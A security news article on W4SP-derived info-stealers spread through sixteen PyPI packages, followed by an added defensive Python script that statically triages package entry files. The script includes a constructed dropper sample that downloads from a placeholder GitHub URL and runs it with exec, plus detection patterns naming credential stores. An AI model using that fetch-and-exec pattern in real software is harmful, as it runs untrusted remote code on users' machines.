A wave of information-stealing malware aimed at software developers is hitting the PyPI Python package repository.
The campaign uses malware copied from the open-source W4SP Stealer, which was behind the November 2022 attack on PyPI.
A further 31 malicious packages dropped by W4SP have since been removed from PyPI, but the operators keep looking for new ways to get their malware onto the platform.
Targeting open-source developers
The Phylum research team reported last week that it had found a campaign distributing W4SP via PyPI. That operation was cut short when GitHub closed the repository the threat actor used to fetch the primary payload.
Yesterday, the cybersecurity company reported that 16 PyPI packages are spreading 10 information-stealing malware variants derived from W4SP Stealer.
The malicious packages, with their download counts at the time of removal, are:
- modulesecurity – 114 downloads
- informmodule – 110 downloads
- chazz – 118 downloads
- randomtime – 118 downloads
- proxygeneratorbil – 91 downloads
- easycordey – 122 downloads
- easycordeyy – 103 downloads
- tomproxies – 150 downloads
- sys-ej – 186 downloads
- py4sync – 453 downloads
- infosys – 191 downloads
- sysuptoer – 186 downloads
- nowsys – 202 downloads
- upamonkws – 205 downloads
- captchaboy – 123 downloads
- proxybooster – 69 downloads
The stealers carried by these packages go by various names, such as Celestial Stealer, ANGEL Stealer and Satan Stealer. Phylum found, however, that all of them reuse the W4SP code.
The new stealers do not reproduce W4SP’s elaborate attack chain, which involved multiple stages and code obfuscation.
Instead, they drop the stealer code directly into the package’s “main.py” or “__init__.py” file without any encoding, so a quick code review is enough to reveal what the package really does.
Image: informmodule ‘__init__.py’ code (source: Phylum)
The one exception is the “chazz” package, which drops a copy of “Leaf $tealer”; that code is obfuscated, but still fairly easy to deobfuscate.
The new stealers also follow W4SP’s approach of fetching the malware payload from remote resources, in this case GitHub repositories.
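The two traits described above, stealer code sitting in plain sight in an entry-point file and a payload fetched from a GitHub-hosted URL, are exactly what a quick review of a downloaded package should look for. The script below is an added example written for this page; it is not Phylum’s tooling and contains no code from any of the packages named in the article. It parses a package’s `__init__.py`, `main.py` and `setup.py` with the standard-library `ast` module and flags dynamic execution, remote fetches, base64-style decoding, payload-hosting URLs and credential-store paths. The indicator lists, the verdict thresholds and both sample files are assumptions constructed for the example; the URL in the dropper sample is a placeholder.

```python
"""Static triage of the files a PyPI package runs on import or install (added example)."""
import ast
import re
from dataclasses import dataclass
from pathlib import Path

ENTRY_FILES = {"__init__.py", "main.py", "setup.py"}
DYNAMIC_EXEC = {"exec", "eval"}
DECODERS = {"b64decode", "b32decode", "a85decode", "unhexlify"}
# Assumed list of hosts commonly used for free payload hosting; GitHub matches the article.
REMOTE_HOST_RE = re.compile(
    r"https?://(raw\.githubusercontent\.com|github\.com|gist\.github\.com|pastebin\.com)/", re.I)
# Assumed file-system strings used by browsers and chat clients for saved credentials.
CRED_PATH_RE = re.compile(r"(Local Storage|leveldb|Login Data|Cookies|\.aws|\.ssh)", re.I)


@dataclass(frozen=True)
class Finding:
    file: str
    line: int
    kind: str
    detail: str


def _call_name(node: ast.Call) -> str:
    if isinstance(node.func, ast.Name):
        return node.func.id
    if isinstance(node.func, ast.Attribute):
        return node.func.attr
    return ""


def _is_remote_fetch(node: ast.Call) -> bool:
    name = _call_name(node)
    if name in {"urlopen", "urlretrieve"}:
        return True
    # requests.get(...) / httpx.get(...) count; a bare dict.get() does not.
    return (name in {"get", "post"} and isinstance(node.func, ast.Attribute)
            and isinstance(node.func.value, ast.Name)
            and node.func.value.id in {"requests", "httpx"})


def triage_source(source: str, filename: str = "<memory>") -> list[Finding]:
    """Return the indicators found in one Python source file, ordered by line."""
    tree = ast.parse(source, filename)
    found = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in DYNAMIC_EXEC:
                found.append(Finding(filename, node.lineno, "dynamic-exec", f"{name}()"))
            elif _is_remote_fetch(node):
                found.append(Finding(filename, node.lineno, "remote-fetch", f"{name}()"))
            elif name in DECODERS:
                found.append(Finding(filename, node.lineno, "decoder", f"{name}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if REMOTE_HOST_RE.search(node.value):
                found.append(Finding(filename, node.lineno, "remote-url", node.value))
            if CRED_PATH_RE.search(node.value):
                found.append(Finding(filename, node.lineno, "credential-path", node.value))
    return sorted(found, key=lambda f: (f.file, f.line))


def verdict(findings: list[Finding]) -> str:
    """Collapse findings into a triage label; the thresholds are this example's assumption."""
    kinds = {f.kind for f in findings}
    remote = bool(kinds & {"remote-fetch", "remote-url"})
    if "dynamic-exec" in kinds and remote:
        return "likely-dropper"   # fetch-then-exec is the W4SP-style loader shape
    if "credential-path" in kinds and remote:
        return "likely-stealer"   # touches credential stores and talks to a remote host
    if findings:
        return "review"
    return "clean"


def triage_package(root: Path) -> tuple[str, list[Finding]]:
    """Scan every entry-point file under an unpacked sdist or wheel directory."""
    findings = []
    for path in sorted(root.rglob("*.py")):
        if path.name in ENTRY_FILES:
            findings.extend(triage_source(path.read_text(encoding="utf-8"), str(path)))
    return verdict(findings), findings


# Constructed sample: a fetch-then-exec __init__.py with a placeholder URL.
SAMPLE_DROPPER_INIT = """\
import base64
from urllib.request import urlopen

def _load():
    src = urlopen("https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/p.txt").read()
    exec(base64.b64decode(src))
"""

# Constructed sample: an ordinary __init__.py that only reads a local config file.
SAMPLE_CLEAN_INIT = """\
import json
from pathlib import Path

def load_config(path="config.json"):
    return json.loads(Path(path).read_text())
"""

if __name__ == "__main__":
    for label, src in (("dropper", SAMPLE_DROPPER_INIT), ("clean", SAMPLE_CLEAN_INIT)):
        hits = triage_source(src, f"{label}/__init__.py")
        print(label, "->", verdict(hits))
        for item in hits:
            print(f"  line {item.line} {item.kind}: {item.detail}")
```

Run `triage_package(Path("unpacked-package/"))` on an sdist extracted with `tar` or a wheel extracted with `unzip` before installing it; a "likely-dropper" or "likely-stealer" verdict is a reason to read the flagged lines, not a final judgement, since the heuristics will also match legitimate code that downloads resources at import time.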
Image: the GitHub repository used by Satan Stealer (source: Phylum)
It is not clear whether these malware clones were created by the same threat actors behind W4SP or by copycats, but Phylum suggests they come from other groups trying to replicate earlier campaigns.
All of the packages in this report have been removed from PyPI, but not before they were downloaded more than 2,500 times in total.
Attackers have grown increasingly interested in open-source package repositories because compromising developer systems gives them a foothold for far larger attacks.
Developers often keep API keys and authorization tokens in their projects, which makes it easier for threat actors to steal sensitive information or mount wider supply-chain attacks.
As long as these campaigns keep producing enough infections, more threat actors will keep uploading malicious packages to open-source repositories.